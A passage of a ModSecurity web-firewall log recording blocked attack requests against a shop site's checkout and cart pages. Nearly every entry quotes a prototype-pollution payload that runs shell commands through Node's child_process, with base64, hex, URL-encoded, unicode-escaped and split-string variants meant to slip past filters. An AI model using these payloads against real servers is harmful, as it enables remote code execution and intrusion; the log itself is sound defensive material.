{\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTDgAAAcM"] [Sun Apr 05 15:42:37.610056 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:44292] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTDwAAAdM"] [Sun Apr 05 15:42:37.681416 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:44326] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTEAAAAcs"] [Sun Apr 05 15:42:37.681834 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:44342] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTEgAAAdc"] [Sun Apr 05 15:42:37.682307 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:44366] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzZc83uMXRUE9zvQTEwAAAdg"] [Sun Apr 05 15:42:37.682633 2026] [:error] [pid 1503:tid 1534] [client 172.94.9.253:44376] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzUI7AjfUQYCN-J7DsQAAANY"] [Sun Apr 05 15:42:37.683018 2026] [:error] [pid 22788:tid 22796] [client 172.94.9.253:44298] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzSLbhFL16Wsx-C9DBwAAAYY"] [Sun Apr 05 15:42:37.683270 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:44356] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/product"] [unique_id "adJmzZc83uMXRUE9zvQTEQAAAc0"] [Sun Apr 05 15:42:37.683947 2026] [:error] [pid 22788:tid 22806] [client 172.94.9.253:44364] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzSLbhFL16Wsx-C9DBgAAAZA"] [Sun Apr 05 15:42:37.684982 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:44308] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzZc83uMXRUE9zvQTFAAAAcY"] [Sun Apr 05 15:42:37.686367 2026] [:error] [pid 31198:tid 31261] [client 172.94.9.253:44320] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzTT5TgrBR8xRnfXA-QAAAUk"] [Sun Apr 05 15:42:37.687200 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:44358] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzZc83uMXRUE9zvQTFQAAAdY"] [Sun Apr 05 15:42:37.761269 2026] [:error] [pid 31198:tid 31255] [client 172.94.9.253:44390] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzTT5TgrBR8xRnfXA-gAAAUM"] [Sun Apr 05 15:42:37.761607 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:44440] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzbxQSOrq_iRTM7dp8AAAARY"] [Sun Apr 05 15:42:37.761672 2026] [:error] [pid 22788:tid 22800] [client 172.94.9.253:44402] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzSLbhFL16Wsx-C9DCAAAAYo"] [Sun Apr 05 15:42:37.761720 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:44414] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzbxQSOrq_iRTM7dp7wAAARg"] [Sun Apr 05 15:42:37.762320 2026] [:error] [pid 1309:tid 1392] [client 172.94.9.253:44384] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzT-XKUNJEHmNu6G7wAAAAJU"] [Sun Apr 05 15:42:37.762486 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:44426] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzbxQSOrq_iRTM7dp8QAAAQ4"] [Sun Apr 05 15:42:37.762487 2026] [:error] [pid 1309:tid 1366] [client 172.94.9.253:44452] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzT-XKUNJEHmNu6G7wQAAAII"] [Sun Apr 05 15:42:37.762533 2026] [:error] [pid 1309:tid 1385] [client 172.94.9.253:44418] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/cart"] [unique_id "adJmzT-XKUNJEHmNu6G7wwAAAI4"] [Sun Apr 05 15:42:37.762619 2026] [:error] [pid 1309:tid 1378] [client 172.94.9.253:44438] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: 